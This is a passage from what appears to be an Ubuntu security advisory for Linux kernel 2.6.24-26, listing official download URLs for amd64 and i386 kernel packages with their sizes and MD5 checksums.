19259814 87ca4d98505a53bfbd833c12f6805de2 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-26-rt_2.6.24-26.64_amd64.deb Size/MD5: 17912348 7bd772e54593f910a261e2f2f60f0862 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-26-xen_2.6.24-26.64_amd64.deb Size/MD5: 18913682 95f44b37c2638260091727900cb9db8c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 23692 263ad2c31c3ee8de2a16262412c68471 http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 26798 84f8c1c6caaedd10b56cc126f0809676 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 218820 99ca49cb3f2820f57c9c8b086652cfb7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 220492 d4449e0ea134b27bda38fe215c999842 http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 51928 ccdb4f878b55dcfc9bd38ddf1d3a4b79 http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 52070 3a5294a668f6a55c98adf137c8a73b27 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 38326 d59d33dc6fe96897534d843648a5007c http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 39082 a0a218b32ea203b9d3a88360923a1cb0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 45996 e18b4d8a899a77256cd1cc7e42f8bcf5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 46164 cc798a284738f343050b42b4b1529927 http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 83250 9138f2c9c2eb06a0f0a33e893ff12e14 http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 83654 ba683ff1f68bd116a61d541de037a5c3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 32394 a827895045875978eced3db31308c78c http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 32672 e09701581ef45c77f11f684412525f01 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 637694 f272533c6bd26bfc80e44298ee4329b8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 656000 f54fb6bcdf21190cc53e4bd48c7cc832 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 209838 5672c677b254cd4bc0ad298e63f9a2f6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 213616 43a51aa70c5ef0d55c14fe48bd19aa45 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 46552 cfd965691b994c4064a69a7b11790043 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 47602 7f1d961fb620bb44a662f7f8b268a008 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 62274 5470e86c2ba3c9ab218cc6011d3bdc47 http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 63622 bf118127c7f40d41b8f21ef80493c701 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 130544 6bbb50c3501f5f62ed447241d39a0b39 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 137024 253d7ed9dfe90933fc278ab923f2cc3a http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 279084 3797d5b7623eefc378f7c3f10ba727c7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 277690 fa48b0ab2bb6c2f7493a10db3f611093 http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-26-386-di_2.6.24-26.64_i386.udeb Size/MD5: 2012662 43d00d0f90e03af2578e7505b9641baf http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-26-generic-di_2.6.24-26.64_i386.udeb Size/MD5: 2087832 897cae80da548574e2a0e1e064290ab5 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-386_2.6.24-26.64_i386.deb Size/MD5: 655080 aa936de2f800113080f9722f5c5c6c17 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-generic_2.6.24-26.64_i386.deb Size/MD5: 657848 054772c97c19c5f40005cbe6b9a8eef6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-openvz_2.6.24-26.64_i386.deb Size/MD5: 1241710 8efd1eca8696e7f7e573e76474ef9966 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-26-rt_2.6.24-26.64_i386.deb Size/MD5: 1264152 957dd410d2d622295597e6e76cf2e62e